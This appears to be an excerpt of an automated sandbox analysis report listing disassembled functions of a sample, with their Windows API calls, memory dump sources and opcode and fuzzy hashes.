                                                    Function 0033E992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                                    • Instruction ID: 0712c76f308ff699f4f8363006ef367268e7dbdcb10713530c6ae17f3963c86f
                                                    • Opcode Fuzzy Hash: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                                    • Instruction Fuzzy Hash: 0CF0C832911A209BD6333E6A9C85B5A33D89F82335F150B15F965AE1D2DF78E8028791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00343BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00336A99,?,0000015D,?,?,?,?,003385D0,000000FF,00000000,?,?), ref: 00343BE2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 310bc6645debd51c1423c8890c33df4a265599d8c2882b9f44bdce39111ae637
                                                    • Instruction ID: 68c2f808fe54f5cd828a4597a5b39b6cb1d994fd14d39fc3139112675751f00b
                                                    • Opcode Fuzzy Hash: 310bc6645debd51c1423c8890c33df4a265599d8c2882b9f44bdce39111ae637
                                                    • Instruction Fuzzy Hash: 2EE06D3160562457E6232A6A9C42F6B76DDEB427A0F1A0121AC46DF4D0DB61FE0086E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003163DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e5b845ec7ee5726224ad6ca7a31d334550aa4a9a590df587a7cdebc8af8765b
                                                    • Instruction ID: d11b0585778cde27591b4f48c4d02079cae158b3bf745f36724820f2284d72c2
                                                    • Opcode Fuzzy Hash: 3e5b845ec7ee5726224ad6ca7a31d334550aa4a9a590df587a7cdebc8af8765b
                                                    • Instruction Fuzzy Hash: 49F08C71000702CFC73A8FA4D490892BBE8FF043163108D3EE5D782920C731A884CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00366A79 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: bab079eb86b998f4df3498b7a7c2b5f487b57c4e320b33b6cfe6495d78778cb3
                                                    • Instruction ID: 4d8c8acd33418bf7f878bbc4d5a66a367a695ea90f3b25c5ad60ba879750c10c
                                                    • Opcode Fuzzy Hash: bab079eb86b998f4df3498b7a7c2b5f487b57c4e320b33b6cfe6495d78778cb3
                                                    • Instruction Fuzzy Hash: A2F02BB1B042005AD7325FB5E816BA2F7D8FF12394F14C90AD8C582281C7B154D4A7D2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00365004 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: bddfd2ecaf31e44093fabcbd7fd2f79dfdd33d1ef132de3cb4dfed3502a61ec5
                                                    • Instruction ID: e10b5e09a0fe577df57f8db5bbc3f35aafbddafe2f495a5a713235944f794073
                                                    • Opcode Fuzzy Hash: bddfd2ecaf31e44093fabcbd7fd2f79dfdd33d1ef132de3cb4dfed3502a61ec5
                                                    • Instruction Fuzzy Hash: 03F06575A002148BDF26DF95E880B99B7E8BF19361F114429E889DB641D67698908B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                    • Instruction ID: 93091f3f4e5d35c4126059c6986bb67690859a3410753cfe0b263fad66d47b27
                                                    • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                    • Instruction Fuzzy Hash: B2F0F87140020DFFDF05DF90C941E9E7B79FB09318F208445F9159A151D336EA65EBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037D4BF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,003541AF,003D4600,00000002), ref: 0037D4E6
                                                      • Part of subcall function 0037D3F7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0037D4D9,?,?,?), ref: 0037D419
                                                      • Part of subcall function 0037D3F7: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0037D4D9,?,?,?,?,003541AF,003D4600,00000002), ref: 0037D42E
                                                      • Part of subcall function 0037D3F7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0037D4D9,?,?,?,?,003541AF,003D4600,00000002), ref: 0037D43A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: File$Pointer$Write
                                                    • String ID:
                                                    • API String ID: 3847668363-0
                                                    • Opcode ID: 58f8e0520134914ee47d3cb088fd115f873d6b3ac760beaff80696b47cca92d7
                                                    • Instruction ID: 52ae0c9551e5cfb73d6451b12b9cdf71c82faa4c94c0db2e02aa974a8a2a2f65
                                                    • Opcode Fuzzy Hash: 58f8e0520134914ee47d3cb088fd115f873d6b3ac760beaff80696b47cca92d7
                                                    • Instruction Fuzzy Hash: 27E06D7A500708EFD7229F4ADC008AAB7FCFF81321710852FF99692510D7B5EA04DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00314154 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID:
                                                    • API String ID: 176396367-0
                                                    • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                    • Instruction ID: 0b952909a7efd536d343d8bb9da57d2e4a7ad40c37f5fcc6a208bd380b4b75a9
                                                    • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                    • Instruction Fuzzy Hash: 80D0A9237420203AB6AA323D2D8BC7F891CCBC2AA0F04013FFA03CE1AAEC444C0301E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037E783 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetShortPathNameW.KERNELBASE ref: 0037E7A2
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: NamePathShort_wcslen
                                                    • String ID:
                                                    • API String ID: 2021730007-0
                                                    • Opcode ID: afb03762b3422b76328d51a4a5bbacbcfabba28b8c15c2a2469446e818d600c2
                                                    • Instruction ID: 16515cf10ff52c253be89bd8b27d6a628302f679dafcfe82013277437e87568b
                                                    • Opcode Fuzzy Hash: afb03762b3422b76328d51a4a5bbacbcfabba28b8c15c2a2469446e818d600c2
                                                    • Instruction Fuzzy Hash: 82E0CD7654022457C711D3589C06FDA77DDDFC9790F040470FC05D7258DD64DD80C590
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003139DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003139FD
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_wcslen
                                                    • String ID:
                                                    • API String ID: 541455249-0
                                                    • Opcode ID: ae5c003e7effab215c74b71e6abb86152deb460aeed30da2f096a1c7ed09af09
                                                    • Instruction ID: 8fdd8d1982e1c0c0bfc21ce9ed35933726897b7d094b8256b9ab938339a5e32c
                                                    • Opcode Fuzzy Hash: ae5c003e7effab215c74b71e6abb86152deb460aeed30da2f096a1c7ed09af09
                                                    • Instruction Fuzzy Hash: F7E0C276A002245BCB22E3989C06FEA77EDDFC9790F0400B1FC09DB258DDA4ED80C690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00364941 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: ce291be7bd6003181168c801bee4e4a64f4356adafcd722429a53e0cee5b8241
                                                    • Instruction ID: 396669dd7bfd15e0aa6a1e836ef9bc247d616112ba5b60a47d661902a0d3b843
                                                    • Opcode Fuzzy Hash: ce291be7bd6003181168c801bee4e4a64f4356adafcd722429a53e0cee5b8241
                                                    • Instruction Fuzzy Hash: 39E08672F001145BCF26CAE5A881BADB774BF15352F110161E945FA211C6239C518A91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037E753 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0037E76C
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FolderPath_wcslen
                                                    • String ID:
                                                    • API String ID: 2987691875-0
                                                    • Opcode ID: 5e4507fb5f028af874eeb3505b7d641e7763368d44e563e7e59c8f13ec7596de
                                                    • Instruction ID: a63c84ac9e492646810f3e3e75ab71f5da36deca94531764e55ea8a0b92e7fb5
                                                    • Opcode Fuzzy Hash: 5e4507fb5f028af874eeb3505b7d641e7763368d44e563e7e59c8f13ec7596de
                                                    • Instruction Fuzzy Hash: A1D05EA19002282BDF64E7759C0DDF73AACC744310F0006A0786DD3142ED34ED8486A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00317953 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00353A1C), ref: 00317973
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 490076e494fb5476ae2a73d66f1da640f117ce1ff51c034350c15597fe641dbc
                                                    • Instruction ID: 1a1fa8f67d4be017f35091a3ae0e4f5fa16f73fe0404975995160ba94c9bfcd2
                                                    • Opcode Fuzzy Hash: 490076e494fb5476ae2a73d66f1da640f117ce1ff51c034350c15597fe641dbc
                                                    • Instruction Fuzzy Hash: 27E09275804B12DFC7364F1AE804452FBF8FED63A13254A2FD0E682660D3B0588ACB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037DA5C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0037D9DC,?,?), ref: 0037DA72
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CopyFile
                                                    • String ID:
                                                    • API String ID: 1304948518-0
                                                    • Opcode ID: a41b624cb1e0c00d7001950768d694e479da76687a197cf685ed2f01072393f7
                                                    • Instruction ID: a408f6b3d39889fba02cb340c358920d102861ee308c37b358add236aabbc6ab
                                                    • Opcode Fuzzy Hash: a41b624cb1e0c00d7001950768d694e479da76687a197cf685ed2f01072393f7
                                                    • Instruction Fuzzy Hash: A8D0A7305D0208BBEF108B50CC03F99B76CE701B45F104194B101EA0D0C7B5A5089724
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0035073A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00350AA4,?,?,00000000,?,00350AA4,00000000,0000000C), ref: 00350757
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: ea02c235d55c9a33b23929b9c8e90c5aa41b9d66522a16da68a83367b1500cc5
                                                    • Instruction ID: d0545d451589b78d402720cf3b613d152d7c79391edb9c14c878c882d395cddc
                                                    • Opcode Fuzzy Hash: ea02c235d55c9a33b23929b9c8e90c5aa41b9d66522a16da68a83367b1500cc5
                                                    • Instruction Fuzzy Hash: B6D06C3210010DBBDF028F84DD06EDA3BAAFB48714F014100BE5856020C736E821AB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037E9C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,0037D755), ref: 0037E9C6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 8891eedff5a80cc3f064725bfa60dc880709324feecf159c617f508ecb1cd1f6
                                                    • Instruction ID: 005ee5e54c658ba9371c924e9b1bf6488f9515d4c3972f7c8e076d1d9ea20a43
                                                    • Opcode Fuzzy Hash: 8891eedff5a80cc3f064725bfa60dc880709324feecf159c617f508ecb1cd1f6
                                                    • Instruction Fuzzy Hash: 15B0922500061005BD7A4A782A081A9730468473A6BD95BD5E5BEA95E2C33D8C0BE610
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 0038A0FA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,766861D0,?,00000000), ref: 0038A11B
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0038A176
                                                    • FindClose.KERNEL32(00000000), ref: 0038A181
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0038A19D
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038A1ED
                                                    • SetCurrentDirectoryW.KERNEL32(003D7B94), ref: 0038A20B
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0038A215
                                                    • FindClose.KERNEL32(00000000), ref: 0038A222
                                                    • FindClose.KERNEL32(00000000), ref: 0038A232
                                                      • Part of subcall function 0037E2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0037E2C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 2640511053-438819550
                                                    • Opcode ID: f44422f80ba68956b65f66ea662cfd9054d2e6c469f478397cc9c7ddd41b8097
                                                    • Instruction ID: 5a191293f67ffa95edb84e4bf128668f1362522351d2e90bed9a761a38fd9d14
                                                    • Opcode Fuzzy Hash: f44422f80ba68956b65f66ea662cfd9054d2e6c469f478397cc9c7ddd41b8097
                                                    • Instruction Fuzzy Hash: 1631F472500B196AEF22BFB4EC48ADE73AC9F06320F1105D3E812E61A0EB75DE45CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039C7A3 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                    Download Yara Rule
                                                    APIs
